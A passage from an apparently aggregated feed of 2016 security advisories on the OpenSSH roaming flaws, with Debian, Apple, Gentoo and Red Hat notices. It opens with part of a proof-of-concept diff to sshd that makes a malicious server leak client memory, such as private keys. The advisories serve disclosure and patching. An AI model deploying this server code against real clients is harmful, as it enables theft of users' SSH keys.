client_session_channel);\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_int(server_session_channel);\n+\t\tpacket_put_int(0); /* server window */\n+\t\tpacket_put_int(0); /* server maxpacket */\n+\t\tpacket_send();\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_DATA);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_string(\"\\0\\n\", 2); /* response\u0026source|sink\u0026run_err */\n+\t\tpacket_send();\n+\n+\t\tpacket_read_expect(SSH2_MSG_CHANNEL_REQUEST);\n+\t\tpacket_get_int(); /* server channel */\n+\t\tdebug(\"%s: channel request %s\", __func__,\n+\t\t packet_get_cstring(NULL));\n+\n+\t\twhile (seconds_left_to_sleep)\n+\t\t\tseconds_left_to_sleep = sleep(seconds_left_to_sleep);\n+\t}\n+\n+\tpacket_start(SSH2_MSG_REQUEST_SUCCESS);\n+\tpacket_put_int(id); /* roaming_id */\n+\tpacket_put_int64(arc4random()); /* cookie */\n+\tpacket_put_int64(0); /* key1 */\n+\tpacket_put_int64(0); /* key2 */\n+\tpacket_put_int(client_out_buf_size - client_send_buf_size);\n+\tpacket_send();\n+\tpacket_write_wait();\n+\n+\tif (overflow != 0) {\n+\t\tconst u_int64_t full_client_out_buf = get_recv_bytes() +\n+\t\t\t\t client_out_buf_size;\n+\n+\t\tu_int fd_leaks = 4 * 8 * 8; /* MIN_CHUNK_SIZE in bits */\n+\t\tif ((cp = strstr(roaming, \"fd_leaks:\")) != NULL)\n+\t\t\tfd_leaks = strtoul(cp + 9, NULL, 0);\n+\t\tdebug(\"%s: fd_leaks %u\", __func__, fd_leaks);\n+\n+\t\twhile (fd_leaks--) {\n+\t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN);\n+\t\t\tpacket_put_cstring(overflow == \u0027X\u0027 ? \"x11\" :\n+\t\t\t \"auth-agent@openssh.com\"); /* ctype */\n+\t\t\tpacket_put_int(arc4random()); /* server channel */\n+\t\t\tpacket_put_int(arc4random()); /* server window */\n+\t\t\tpacket_put_int(arc4random()); /* server maxpacket */\n+\t\t\tif (overflow == \u0027X\u0027) {\n+\t\t\t\tpacket_put_cstring(\"\"); /* originator */\n+\t\t\t\tpacket_put_int(arc4random()); /* port */\n+\t\t\t}\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\t\tpacket_get_int(); /* server channel */\n+\t\t\tpacket_get_int(); /* client channel */\n+\t\t\tpacket_get_int(); /* client window */\n+\t\t\tpacket_get_int(); /* client maxpacket */\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\twhile (get_recv_bytes() \u003c= full_client_out_buf) {\n+\t\t\tpacket_start(SSH2_MSG_GLOBAL_REQUEST);\n+\t\t\tpacket_put_cstring(\"\"); /* rtype */\n+\t\t\tpacket_put_char(1); /* want_reply */\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_REQUEST_FAILURE);\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\tif (kex == NULL)\n+\t\t\tfatal(\"%s: no kex, cannot rekey\", __func__);\n+\t\tif (kex-\u003eflags \u0026 KEX_INIT_SENT)\n+\t\t\tfatal(\"%s: KEX_INIT_SENT already\", __func__);\n+\t\tchar *const ptr = buffer_ptr(\u0026kex-\u003emy);\n+\t\tconst u_int len = buffer_len(\u0026kex-\u003emy);\n+\t\tif (len \u003c= 1+4) /* first_kex_follows + reserved */\n+\t\t\tfatal(\"%s: kex len %u\", __func__, len);\n+\t\tptr[len - (1+4)] = 1; /* first_kex_follows */\n+\t\tkex_send_kexinit(kex);\n+\n+\t\tu_int i;\n+\t\tpacket_read_expect(SSH2_MSG_KEXINIT);\n+\t\tfor (i = 0; i \u003c KEX_COOKIE_LEN; i++)\n+\t\t\tpacket_get_char();\n+\t\tfor (i = 0; i \u003c PROPOSAL_MAX; i++)\n+\t\t\tfree(packet_get_string(NULL));\n+\t\tpacket_get_char(); /* first_kex_follows */\n+\t\tpacket_get_int(); /* reserved */\n+\t\tpacket_check_eom();\n+\n+\t\tchar buf[8192*2]; /* two packet_read_seqnr bufferfuls */\n+\t\tmemset(buf, \u0027\\0\u0027, sizeof(buf));\n+\t\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL);\n+\t\tpacket_put_string(buf, sizeof(buf));\n+\t\tpacket_send();\n+\t\tconst Buffer *const output = packet_get_output();\n+\t\tdump_roaming_file(\"output\", buffer_ptr(output),\n+\t\t\t\t\t buffer_len(output));\n+\t}\n+\n+\tconst u_int64_t client_write_bytes = get_recv_bytes();\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\tdump_roaming_file(\"client_write_bytes\", \u0026client_write_bytes,\n+\t\t\t\t\t sizeof(client_write_bytes));\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n server_input_global_request(int type, u_int32_t seq, void *ctxt)\n {\n \tchar *rtype;\n@@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_\n \t} else if (strcmp(rtype, \"no-more-sessions@openssh.com\") == 0) {\n \t\tno_more_sessions = 1;\n \t\tsuccess = 1;\n+\t} else if (strcmp(rtype, ROAMING_REQUEST) == 0) {\n+\t\tif (want_reply != 1)\n+\t\t\tfatal(\"%s: rtype %s want_reply %d\", __func__,\n+\t\t\t\t rtype, want_reply);\n+\t\troaming_disconnect(ctxt);\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, ROAMING_REQUEST);\n \t}\n \tif (want_reply) {\n \t\tpacket_start(success ?\ndiff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c\n--- openssh-6.4p1/sshd.c\t2013-07-19 20:21:53.000000000 -0700\n+++ openssh-6.4p1+roaming/sshd.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -2432,6 +2432,8 @@ do_ssh2_kex(void)\n \t}\n \tif (options.kex_algorithms != NULL)\n \t\tmyproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms;\n+\telse\n+\t\tmyproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX \",\" KEX_RESUME;\n \n \tif (options.rekey_limit || options.rekey_interval)\n \t\tpacket_set_rekey_limits((u_int32_t)options.rekey_limit,\n. \n\nMore details about identifying an attack and mitigations will be\navailable in the Qualys Security Advisory. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:6.0p1-4+deb7u3. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:6.7p1-5+deb8u1. \n\nFor the testing distribution (stretch) and unstable distribution (sid), these\nproblems will be fixed in a later version. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update\n2016-002\n\nOS X El Capitan 10.11.4 and Security Update 2016-002 is now available\nand addresses the following:\n\napache_mod_php\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team\n\nAppleUSBNetworking\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nBluetooth\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1735 : Jeonghoon Shin@A.D.D\nCVE-2016-1736 : beist and ABH of BoB\n\nCarbon\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .dfont file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2016-1737 : an anonymous researcher\n\ndyld\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker may tamper with code-signed applications to\nexecute arbitrary code in the application\u0027s context\nDescription: A code signing verification issue existed in dyld. \nCVE-ID\nCVE-2016-1738 : beist and ABH of BoB\n\nFontParser\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1743 : Piotr Bania of Cisco Talos\nCVE-2016-1744 : Ian Beer of Google Project Zero\n\nIOFireWireFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to cause a denial of service\nDescription: A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1745 : sweetchip of Grayhash\n\nIOGraphics\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\nCVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nIOUSBFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of\nTrend Micro working with Trend Micro\u0027s Zero Day Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\nCVE-2016-1759 : lokihardt\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a JavaScript link can reveal sensitive user\ninformation\nDescription: An issue existed in the processing of JavaScript links. \nThis issue was addressed through improved content security policy\nchecks. \nCVE-ID\nCVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of\nBishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox\n\nNVIDIA Graphics Drivers\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1741 : Ian Beer of Google Project Zero\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Connecting to a server may leak sensitive user information,\nsuch as a client\u0027s private keys\nDescription: Roaming, which was on by default in the OpenSSH client,\nexposed an information leak and a buffer overflow. These issues were\naddressed by disabling roaming in the client. \nCVE-ID\nCVE-2016-0777 : Qualys\nCVE-2016-0778 : Qualys\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Multiple vulnerabilities in LibreSSL\nDescription: Multiple vulnerabilities existed in LibreSSL versions\nprior to 2.1.8. These were addressed by updating LibreSSL to version\n2.1.8. \nCVE-ID\nCVE-2015-5333 : Qualys\nCVE-2015-5334 : Qualys\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory leak existed in OpenSSL versions prior to\n0.9.8zh. This issue was addressed by updating OpenSSL to version\n0.9.8zh. \nCVE-ID\nCVE-2015-3195\n\nPython\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2014-9495\nCVE-2015-0973\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1767 : Francis Provencher from COSIG\nCVE-2016-1768 : Francis Provencher from COSIG\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1769 : Francis Provencher from COSIG\n\nReminders\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a tel link can make a call without prompting the\nuser\nDescription: A user was not prompted before invoking a call. This\nwas addressed through improved entitlement checks. \nCVE-ID\nCVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of\nLaurent.ca\n\nRuby\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An unsafe tainted string usage vulnerability existed in\nversions prior to 2.0.0-p648. \nCVE-ID\nCVE-2015-7551\n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to check for the existence of\narbitrary files\nDescription: A permissions issue existed in code signing tools. This\nwas addressed though additional ownership checks. \nCVE-ID\nCVE-2016-1773 : Mark Mentovai of Google Inc. \n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTcl\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by removing libpng. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\n\nTrueTypeScaler\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWi-Fi\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nOS X El Capitan 10.11.4 includes the security content of Safari 9.1. \nhttps://support.apple.com/kb/HT206171\n\nOS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6\nARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w\nHiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l\nJy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau\n/71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi\nUhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng\nO+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78\njuPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF\ni9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP\nIzo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X\nqlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q\nVZmOKa8qMxB1L/JmdCqy\n=mZR+\n-----END PGP SIGNATURE-----\n. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/openssh \u003c 7.1_p2 \u003e= 7.1_p2\n\nDescription\n===========\n\nQualys have reported two issues in the \"roaming\" code included in the\nOpenSSH client, which provides undocumented, experimental support for\nresuming SSH connections. Users with private keys that are not protected by a\npassphrase are advised to generate new keys if they have connected to\nan SSH server they don\u0027t fully trust. To do\nso, add \"UseRoaming no\" to the SSH client configuration, or specify \"-o\n\u0027UseRoaming no\u0027\" on the command line. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-7.1_p2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-0777\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777\n[ 2 ] CVE-2016-0778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201601-01\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssh security update\nAdvisory ID: RHSA-2016:0043-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0043.html\nIssue date: 2016-01-14\nCVE Names: CVE-2016-0777 CVE-2016-0778 \n=====================================================================\n\n1. Summary:\n\nUpdated openssh packages that fix two security issues are now available for\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSH is OpenBSD\u0027s SSH (Secure Shell) protocol implementation. \nThese packages include the core files necessary for both the OpenSSH client\nand server. (CVE-2016-0778)\n\nRed Hat would like to thank Qualys for reporting these issues. \n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nppc64:\nopenssh-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-clients-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-6.6.1p1-23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 